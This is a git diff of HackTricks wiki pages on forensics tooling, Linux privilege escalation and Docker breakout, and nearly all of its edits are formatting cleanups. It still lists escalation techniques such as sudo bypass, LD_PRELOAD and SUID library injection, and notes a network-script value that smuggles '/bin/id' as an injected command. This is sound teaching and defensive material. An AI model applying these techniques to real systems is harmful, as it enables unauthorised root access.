@@ -107,13 +107,13 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk [PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). -### NeoPI +### NeoPI -****[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. ### **php-malware-finder** -****[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. ### Apple Binary Signatures diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md index 0dbc4bb4..38b945fb 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md 
@@ -368,7 +368,7 @@ volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3 ### UserAssist - **Windows** systems maintain a set of **keys** in the registry database (**UserAssist keys**) to keep track of programs that executed. The number of executions and last execution date and time are available in these **keys**. +**Windows** systems maintain a set of **keys** in the registry database (**UserAssist keys**) to keep track of programs that executed. The number of executions and last execution date and time are available in these **keys**. {% tabs %} {% tab title="vol3" %} diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index b6d52454..ececc18d 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -85,7 +85,7 @@ Searches for AES keys by searching for their key schedules. Able to find 128. 19 Download [here](https://sourceforge.net/projects/findaes/). -## Complementary tools +## Complementary tools You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.\ You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md index 84fcdb46..2a55a22e 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md 
@@ -122,7 +122,7 @@ Some interesting attributes: * Access date * MFT update date * DOS File permissions -* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (among others): +* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (among others): * File name * Creation date * Modification date diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 25b44f00..e24fb15e 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -6,9 +6,9 @@ A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file for ## Online tools for pcaps -* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)\*\*\*\* -* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)\*\*\*\* -* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)\*\*\*\* +* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com) +* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) ## Extract Information 
@@ -28,7 +28,7 @@ You can find some Wireshark trick in: ### Xplico Framework -\*\*\*\*[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. +[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. #### Install @@ -118,7 +118,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ### YaraPcap -\*\*\*\*[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that * Reads a PCAP File and Extracts Http Streams. * gzip deflates any compressed streams diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index acffa2f3..c73fb051 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md 
@@ -61,11 +61,11 @@ Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ Other interesting filters: -* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` +* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` * HTTP and initial HTTPS traffic -* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` +* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` * HTTP and initial HTTPS traffic + TCP SYN -* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` +* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` * HTTP and initial HTTPS traffic + TCP SYN + DNS requests ### Search diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index 212ba08b..0d4d57ec 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md 
@@ -82,7 +82,7 @@ Check the previous error documentation. ## Automatic Tool -The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller). +The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller). Several YARA rules are available to determine if the executable is written in python (This script also confirms if the executable is created with either py2exe or pyinstaller). diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 1a959535..6bb03ae2 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md 
@@ -31,7 +31,7 @@ Each profile has a "**Path**" variable with the name of the folder where it's da Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) path you should be able to find the following interesting files: * _**places.sqlite**_ : History (moz_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\__annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_. - * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` + * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` * Note that the link type is a number that indicates: * 1: User followed a link * 2: User wrote the URL @@ -51,7 +51,7 @@ Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) pa * _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file. * _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**. - Information that can be obtained: + Information that can be obtained: * URL, fetch Count, Filename, Content type, FIle size, Last modified time, Last fetched time, Server Last Modified, Server Response * _**favicons.sqlite**_ : Favicons 
@@ -96,7 +96,7 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa * Reloaded * _**Cookies**_ : Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) can be used to inspect the cookies. * _**Cache**_ : Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) to inspect the ca -* _**Bookmarks**_ : Bookmarks +* _**Bookmarks**_ : Bookmarks * _**Web Data**_ : Form History * _**Favicons**_ : Favicons * _**Login Data**_ : Login information (usernames, passwords...) @@ -147,7 +147,7 @@ The metadata information about the cache stores: #### Files -The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ +The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS). @@ -169,7 +169,7 @@ The metadata information about the cookies stores: #### Files -The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ +The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ Session cookies will reside in memory and persistent cookie in the disk. 
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 91b41887..8ed11ce6 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -2,7 +2,7 @@ ## Introduction -Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts). +Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts). Broadly speaking, there are two generations of Office file format: the **OLE formats** (file extensions like RTF, DOC, XLS, PPT), and the "**Office Open XML**" formats (file extensions that include DOCX, XLSX, PPTX). **Both** formats are structured, compound file binary formats that **enable Linked or Embedded content** (Objects). OOXML files are actually zip file containers, meaning that one of the easiest ways to check for hidden data is to simply `unzip` the document: diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index b243e65c..dca94dd9 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md 
@@ -81,7 +81,7 @@ To inspect these files you can use [**LinkParser**](http://4discovery.com/our-to In this tools you will find 2 set of timestamps: **FileModifiedDate**, **FileAccessDate** and **FileCreationDate**, and **LinkModifiedDate**, **LinkAccessDate** and **LinkCreationDate**. The first set of timestamp references the **timestamps of the link file itself**. The second set references the **timestamps of the linked file**. -You can get the same information running the Windows cli tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)\*\*\*\* +You can get the same information running the Windows cli tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs @@ -353,7 +353,7 @@ The cache stores various file metadata depending on the operating system, such a This information can be found in the registry in: -* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` +* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` * XP (96 entries) * `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` * Server 2003 (512 entries) @@ -478,7 +478,7 @@ This event is recorded by the EventID 4616 inside the Security Event log. The following System EventIDs are useful: * 20001 / 20003 / 10000: First time it was used -* 10100: Driver update +* 10100: Driver update The EventID 112 from DeviceSetupManager contains the timestamp of each USB device inserted. diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index b4703689..38070ed2 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md 
@@ -32,7 +32,7 @@ ### Shared Folders -* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC` +* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC` * CSCFlag=0 -> By default the user needs to indicate the files that he wants to cache * CSCFlag=16 -> Automatic caching documents. “All files and programs that users open from the shared folder are automatically available offline” with the “optimize for performance" unticked. * CSCFlag=32 -> Like the previous options by “optimize for performance” is ticked @@ -42,10 +42,10 @@ ### AutoStart programs -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` -* `Software\Microsoft\Windows\CurrentVersion\Runonce` -* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `Software\Microsoft\Windows\CurrentVersion\Runonce` +* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` * `Software\Microsoft\Windows\CurrentVersion\Run` ### Explorer Searches 
@@ -110,7 +110,7 @@ Desktop Access: * `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` * `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` -To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time\*\*. +To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time**. Note 2 things from the following image: diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md index 0d444e1f..e5e574d4 100644 --- a/linux-unix/linux-privilege-escalation-checklist.md +++ b/linux-unix/linux-privilege-escalation-checklist.md 
@@ -9,11 +9,11 @@ description: Checklist for privilege escalation in Linux Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -104,7 +104,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)? * [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? * [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass -* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)\*\*\*\* +* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload) * [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder? * [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? * [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)? diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md index c44b2e14..0f18ea6a 100644 --- a/linux-unix/privilege-escalation/README.md +++ b/linux-unix/privilege-escalation/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -341,7 +341,7 @@ Press Ctrl-C to end monitoring without terminating the process. To dump a process memory you could use: -* [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)\*\*\*\* +* [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) * [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - _You can manually remove root requirements and dump process owned by you_ * Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required) 
@@ -654,7 +654,7 @@ If you find that you can use the **`runc`** command read the following page as * D-BUS is an **inter-process communication (IPC) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. -D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. _\*\*_(From [here](https://www.linuxjournal.com/article/7744)). +D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. _**_(From [here](https://www.linuxjournal.com/article/7744)). D-Bus uses an **allow/deny model**, where each message (method call, signal emission, etc.) 
can be **allowed or denied** according to the sum of all policy rules which match it. Each or rule in the policy should have the `own`, `send_destination` or `receive_sender` attribute set. @@ -1241,7 +1241,7 @@ Specifies files that contains the public keys that can be used for user authenti AuthorizedKeysFile .ssh/authorized_keys access ``` -That configuration will indicate that if you try to login with the **private** key \*\*\*\*of the user "\*\*testusername\*\*" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` +That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` #### ForwardAgent/AllowAgentForwarding @@ -1259,7 +1259,7 @@ Notice that if `Host` is `*` every time the user jumps to a different machine th The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). -If you Forward Agent configured in an environment \*\*\*\*\[\*\*check here how to exploit it to escalate privileges\*\*]\(ssh-forward-agent-exploitation.md). +If you Forward Agent configured in an environment \[**check here how to exploit it to escalate privileges**]\(ssh-forward-agent-exploitation.md). ## Interesting Files 
@@ -1490,7 +1490,7 @@ DEVICE=eth0 (_Note the black space between Network and /bin/id_) -**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f)\*\*\*\* +**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) ### **init, init.d, systemd, and rc.d** diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md index 47134389..bc159135 100644 --- a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md +++ b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -336,7 +336,7 @@ dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oou _Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._ -### C code +### C code {% code title="d-bus_server.c" %} ```c diff --git a/linux-unix/privilege-escalation/docker-breakout/README.md b/linux-unix/privilege-escalation/docker-breakout/README.md index c23c3bbb..c6f9d1cb 100644 --- a/linux-unix/privilege-escalation/docker-breakout/README.md +++ b/linux-unix/privilege-escalation/docker-breakout/README.md 
@@ -102,7 +102,7 @@ When I changed Docker host, I had to move the root keys and repository keys to o ### Namespaces -**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. +**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. Docker makes use of the following Linux kernel Namespaces to achieve Container isolation: @@ -245,7 +245,7 @@ docker build --secret my_key=my_value ,src=path/to/my_secret_file . Where your file specifies your secrets as key-value pair. -These secrets are excluded from the image build cache. and from the final image. +These secrets are excluded from the image build cache. and from the final image. If you need your **secret in your running container**, and not just when building your image, use **Docker Compose or Kubernetes**. 
@@ -291,7 +291,7 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration * Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. * [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. * [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -* ****[**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. +* [**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. * **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required. * **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. 
Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP. * **Regularly** **rebuild** your images to **apply security patches to the host an images.** diff --git a/linux-unix/privilege-escalation/docker-breakout/apparmor.md b/linux-unix/privilege-escalation/docker-breakout/apparmor.md index 2014ee33..e67abb21 100644 --- a/linux-unix/privilege-escalation/docker-breakout/apparmor.md +++ b/linux-unix/privilege-escalation/docker-breakout/apparmor.md @@ -42,7 +42,7 @@ aa-mergeprof #used to merge the policies ## Creating a profile * In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files. -* To indicate the access the binary will have over **files** the following **access controls** can be used: +* To indicate the access the binary will have over **files** the following **access controls** can be used: * **r** (read) * **w** (write) * **m** (memory map as executable) diff --git a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md index 40cb3712..24aba954 100644 --- a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md +++ b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md 
@@ -36,7 +36,7 @@ In the page [route\_parser.go](https://github.com/twistlock/authz/blob/master/co ### Simple Plugin Tutorial -You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)**** +You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) Read the `README` and the `plugin.go` code to understand how is it working. diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md index 5d5b2df6..6c3245b2 100644 --- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md +++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md 
